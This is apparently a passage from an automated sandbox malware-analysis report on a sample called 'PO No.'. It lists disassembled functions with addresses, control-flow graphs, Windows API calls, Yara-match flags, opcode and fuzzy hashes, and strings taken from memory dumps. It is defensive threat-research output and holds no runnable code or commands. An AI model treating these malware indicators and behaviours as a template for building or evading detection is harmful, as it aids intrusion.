                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$"
                                                            • API String ID: 0-3758156766
                                                            • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                            • Instruction ID: 518512b92e610a2c72f27c2807d80c46f8afbc142dbd0561df3d338ac934ec81
                                                            • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                            • Instruction Fuzzy Hash: 8FF104B1D01229AFDF20DFA4DC84BEEB7B9AF44350F1481A9E509A7241DB34AE45DF90
                                                            Function 00F11B91 Relevance: 2.9, Strings: 2, Instructions: 355COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 173 f11b91-f11b93 174 f11c02-f11c31 173->174 175 f11b95 173->175 176 f11c33-f11c4b 174->176 177 f11b97-f11b9f 175->177 178 f11bf9-f11c00 175->178 180 f11c4d 176->180 181 f11c4e-f11c54 176->181 184 f11b31 177->184 185 f11ba1-f11ba2 177->185 178->174 179 f11c32 178->179 179->176 180->181 181->176 183 f11c56-f11c5b 181->183 186 f11c60-f11c73 183->186 189 f11b33-f11b44 184->189 190 f11b1c 184->190 187 f11ba4 185->187 188 f11bcc-f11bd9 185->188 186->186 191 f11c75-f11c7d 186->191 193 f11ba8-f11bc6 187->193 204 f11b6b-f11b7c 188->204 205 f11bdb-f11be4 188->205 192 f11b46 189->192 189->193 194 f11b1d-f11b1f 190->194 195 f11aae-f11ac1 190->195 196 f11c84 191->196 197 f11c7f-f11c83 191->197 203 f11b49 192->203 193->188 202 f11b21-f11b30 194->202 194->203 201 f11ac5 195->201 198 f11c86 196->198 199 f11c89-f11c8f 196->199 197->196 198->199 199->191 206 f11c91-f11ca8 call f11170 199->206 207 f11a87-f11a9b 201->207 208 f11ac6-f11ae3 201->208 202->184 209 f11b80-f11b90 203->209 204->209 205->178 220 f11cb0-f11cc3 206->220 213 f11b18 207->213 214 f11a9c 207->214 208->201 212 f11ae5-f11aea 208->212 209->173 218 f11af4-f11afe 212->218 219 f11aec 212->219 213->190 215 f11a34-f11a42 214->215 216 f11a9d-f11aad 214->216 216->195 223 f11af1 218->223 224 f11b00-f11b0d 218->224 221 f11a84-f11a85 219->221 222 f11aee-f11af0 219->222 220->220 226 f11cc5 220->226 221->207 222->223 223->218 224->213 227 f11cc7-f11cdf 226->227 228 f11ce1 227->228 229 f11ce2-f11ce8 227->229 228->229 229->227 230 f11cea-f11cef 229->230 231 f11cf0-f11d03 230->231 231->231 232 f11d05 231->232 233 f11d07-f11d1f 232->233 234 f11d21 233->234 235 f11d22-f11d28 233->235 234->235 235->233 236 f11d2a-f11d58 call f11ed0 235->236 239 f11d60-f11d71 236->239 239->239 240 f11d73-f11d7f call f11000 239->240 242 f11d84-f11d8a call f40173 240->242 243 f11d8c-f11d99 242->243 244 f11da0-f11db1 243->244 244->244 245 f11db3-f11dca 244->245 246 f11dd0-f11dd9 245->246 246->246 247 f11ddb-f11de3 246->247
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfff$qi
                                                            • API String ID: 0-3408824469
                                                            • Opcode ID: a95e5d50df6edfb49d81f520a931f9eb9f4de885697bd48b850d5fb313312a87
                                                            • Instruction ID: 423b6c892c94dda720ebecd827f8b305aea5cd99ab58aeaba2f2b85da99e3fd2
                                                            • Opcode Fuzzy Hash: a95e5d50df6edfb49d81f520a931f9eb9f4de885697bd48b850d5fb313312a87
                                                            • Instruction Fuzzy Hash: 0DB1D273A483560FD71ACA2C8C922E87F55FF92320F1852AEDA51CF2D3E2118996D7C0
                                                            Function 00F27CA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 249 f27ca3-f27ccc call f3f7e3 252 f27cd2-f27ce0 call f3fde3 249->252 253 f27cce-f27cd1 249->253 256 f27ce2-f27ced call f40083 252->256 257 f27cf0-f27d01 call f3e283 252->257 256->257 262 f27d03-f27d17 LdrLoadDll 257->262 263 f27d1a-f27d1d 257->263 262->263
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00F27D15
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                            • Instruction ID: 9aa9485dbd212c0223421ca34ad0ea810d8502a68f31c66c1b0b4991b95c67cc
                                                            • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                            • Instruction Fuzzy Hash: A3011EB5E4420DABDB10EBE4DC42FDEB778AB54314F0041A5E90897240F635EB589B91
                                                            Function 00F3CB43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 274 f3cb43-f3cb7f call f14903 call f3dd73 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00F3CB7A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                            • Instruction ID: 0859b049b883547432c8f9177687b0d89b069a4b3fd26d60ad0d357e17a36482
                                                            • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                            • Instruction Fuzzy Hash: 6FE04672200244BBD220EA59DC02F9BB76CDFC5720F008555FA58A7242C671B91187E0
                                                            Function 00FD2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 288 fd2b60-fd2b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction ID: 3e764b1e9f245c7651c747a94e849b882e0032962d548aa108ace271c68f3463
                                                            • Opcode Fuzzy Hash: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction Fuzzy Hash: 0990026120244013420571598414616400A87E0741B55C032E1054590EC92989927126
                                                            Function 00FD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 289 fd2c70-fd2c7c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction ID: aa0ef7dc569921d01adcd22b94149f9d3583c54bd46764b4a3a2b720793a5fc0
                                                            • Opcode Fuzzy Hash: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction Fuzzy Hash: BD9002312014C812D2107159C40474A000587D0741F59C432A4464658E8A9989927122
                                                            Function 00FD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 290 fd2df0-fd2dfc LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
                                                            • Instruction ID: 2805ce5739546bf28ef350ca54bd94a1153e5ae1c88c77c206af936020e35fcb
                                                            • Opcode Fuzzy Hash: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
                                                            • Instruction Fuzzy Hash: D190023120144423D21171598504707000987D0781F95C433A0464558E9A5A8A53B122
                                                            Function 00FD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 291 fd35c0-fd35cc LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction ID: 3a94c62ced44d4a3a77684c6d6c9775427a01b8979a48b7f5db9c99936fa5078
                                                            • Opcode Fuzzy Hash: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction Fuzzy Hash: 4890023160554412D20071598514706100587D0741F65C432A0464568E8B998A5275A3
                                                            Function 00F244C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00F2456A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 17O3k-2I$17O3k-2I
                                                            • API String ID: 1836367815-2455829943
                                                            • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                            • Instruction ID: 8da1417485c7dd1c354f28c4f3a47e4406c82b84a8941f162d5916ec7613080e
                                                            • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                            • Instruction Fuzzy Hash: 0C117AB2D4415C7ACB00EBE09C82DEE7F7CEF40368F0440A8F954AB201C3789E068BA5
                                                            Function 00F244F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00F2456A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 17O3k-2I$17O3k-2I
                                                            • API String ID: 1836367815-2455829943
                                                            • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                            • Instruction ID: 06f8386d459faca35cc0495673b241a4928c20f704e869c3eb7680e6e163f3f9
                                                            • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                            • Instruction Fuzzy Hash: 0301D2B2D0025C7ADB10ABE19C82DEF7B7CDF417A4F048068FA04A7241D6689E068BA5
                                                            Function 00F3CEB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 269 f3ceb3-f3cef4 call f14903 call f3dd73 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00018623,00000007,00000000,00000004,00000000,00F27514,000000F4), ref: 00F3CEEF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                            • Instruction ID: 5d8fdad19e324383c9ed734a54ab6f76ed312a353160cc55142b12ab3eef96a2
                                                            • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                            • Instruction Fuzzy Hash: D2E06DB1604204BBD610EE58EC41FDF37ACEFC8710F004008F918A7242C771B9118BB4
                                                            Function 00F3CE63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 264 f3ce63-f3cea7 call f14903 call f3dd73 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00F2EA4E,?,?,00000000,?,00F2EA4E,?,?,?), ref: 00F3CEA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                            • Instruction ID: d233b5778b652f3d789cd0bb9c71052e73f7ba4c6a5e486557c9bf5dd321e506
                                                            • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                            • Instruction Fuzzy Hash: E3E06DB2614244BBD614EE58DC42EAB77ACEFC8710F004049FA08A7242C770B91086B4
                                                            Function 00F3CF03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 279 f3cf03-f3cf38 call f14903 call f3dd73 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 00F3CF33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                            • Instruction ID: f22521f08d4fbd7755f7eb5f0adbbb2489d81485411ea96a012d0b06f34084e3
                                                            • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                            • Instruction Fuzzy Hash: 19E08C326006147BC220EE59EC01F9B77ACDFC5720F108095FA08A7286D6B5B9108BF4
                                                            Function 00FD2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 284 fd2c0a-fd2c0f 285 fd2c1f-fd2c26 LdrInitializeThunk 284->285 286 fd2c11-fd2c18 284->286
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 07feb4c128ab9f82e08a1cced18b8ce04f549aef7413500963ad98cf9c1674e3
                                                            • Instruction ID: ba25199be79a2a86bf2b9e5899b02663973e01eda851ebaa35c227d64bef9462
                                                            • Opcode Fuzzy Hash: 07feb4c128ab9f82e08a1cced18b8ce04f549aef7413500963ad98cf9c1674e3
                                                            • Instruction Fuzzy Hash: 3BB09B72D015C5D5DB51F760460871B790167E0751F19C073D2070651F473CC5D1F1B6

                                                            Non-executed Functions

                                                            Function 01048D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01048F2D
                                                            • *** then kb to get the faulting stack, xrefs: 01048FCC
                                                            • The instruction at %p referenced memory at %p., xrefs: 01048EE2
                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01048F3F
                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01048F34
                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01048F26
                                                            • *** enter .exr %p for the exception record, xrefs: 01048FA1
                                                            • The instruction at %p tried to %s , xrefs: 01048F66
                                                            • The critical section is owned by thread %p., xrefs: 01048E69
                                                            • *** Inpage error in %ws:%s, xrefs: 01048EC8
                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01048DB5
                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01048DD3
                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01048DA3
                                                            • a NULL pointer, xrefs: 01048F90
                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01048E3F
                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01048FEF
                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01048E4B
                                                            • The resource is owned shared by %d threads, xrefs: 01048E2E
                                                            • <unknown>, xrefs: 01048D2E, 01048D81, 01048E00, 01048E49, 01048EC7, 01048F3E
                                                            • Go determine why that thread has not released the critical section., xrefs: 01048E75
                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01048E02
                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01048E86
                                                            • This failed because of error %Ix., xrefs: 01048EF6
                                                            • read from, xrefs: 01048F5D, 01048F62
                                                            • write to, xrefs: 01048F56
                                                            • *** enter .cxr %p for the context, xrefs: 01048FBD
                                                            • The resource is owned exclusively by thread %p, xrefs: 01048E24
                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01048D8C
                                                            • an invalid address, %p, xrefs: 01048F7F
                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01048DC4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                            • API String ID: 0-108210295
                                                            • Opcode ID: 59bdca852d4ce9252ff9831576f4f0b292462b055ba06d5e634f2df675f22d8d
                                                            • Instruction ID: 3eb6dbf05151819fb992322f1767925fb0fffc9a082256c1b81849776800eca1
                                                            • Opcode Fuzzy Hash: 59bdca852d4ce9252ff9831576f4f0b292462b055ba06d5e634f2df675f22d8d
                                                            • Instruction Fuzzy Hash: 548168B5A00211BFDB25AB58CC89EEB3F75EF56B14F0080A5F6486F162E3B9C501D762
                                                            Function 01012349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2160512332
                                                            • Opcode ID: 0901e030fbb789b110ff2392e189557d3206325d906309cdb77c2c0ab0889ce9
                                                            • Instruction ID: 2211725d9287bf67c45c95bd383264be2e91d5973864c16fab637b80dfbb7ce2
                                                            • Opcode Fuzzy Hash: 0901e030fbb789b110ff2392e189557d3206325d906309cdb77c2c0ab0889ce9
                                                            • Instruction Fuzzy Hash: 90929C71608341AFE721DF28C881B6BB7E9BB84750F14482DFAD4DB295D778E844CB92
                                                            Function 00F868B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-3089669407
                                                            • Opcode ID: 2b2995c43a5b4eade75e2565dbae428525e91d13d96d8d57974259f92a5f4a1b
                                                            • Instruction ID: d19aaa646e3921c04b045210f45fa1bff1240a351a3b8013c5792975f925d9e4
                                                            • Opcode Fuzzy Hash: 2b2995c43a5b4eade75e2565dbae428525e91d13d96d8d57974259f92a5f4a1b
                                                            • Instruction Fuzzy Hash: 4C8162B2D05219BF8B21FBE4EDC5EEE77BDAB44710B044422B940F7111E765EE04ABA0
                                                            Function 01035910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01035A84
                                                            • @, xrefs: 0103647A
                                                            • LanguageConfigurationPending, xrefs: 01036221
                                                            • @, xrefs: 010361B0
                                                            • Control Panel\Desktop, xrefs: 0103615E
                                                            • @, xrefs: 01036277
                                                            • @, xrefs: 010363A0
                                                            • @, xrefs: 01036027
                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01035FE1
                                                            • PreferredUILanguagesPending, xrefs: 010361D2
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0103635D
                                                            • PreferredUILanguages, xrefs: 010363D1
                                                            • LanguageConfiguration, xrefs: 01036420
                                                            • InstallLanguageFallback, xrefs: 01036050
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                            • API String ID: 0-1325123933
                                                            • Opcode ID: b4543bb91d3032aba66db30ff0292b3fa1386d0be5e39eb5b71f5246b4ff774f
                                                            • Instruction ID: 1626c5c118f65c1ec62545d08f8fee50004bb8f3743f23d5196390fb4912df5a
                                                            • Opcode Fuzzy Hash: b4543bb91d3032aba66db30ff0292b3fa1386d0be5e39eb5b71f5246b4ff774f
                                                            • Instruction Fuzzy Hash: 467269715083419FD365DF29C840BABBBE9BBC8700F44492EFAC5D7290EB75D9058BA2
                                                            Function 00FC8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Critical section address, xrefs: 01005425, 010054BC, 01005534
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054E2
                                                            • Address of the debug info found in the active list., xrefs: 010054AE, 010054FA
                                                            • corrupted critical section, xrefs: 010054C2
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01005543
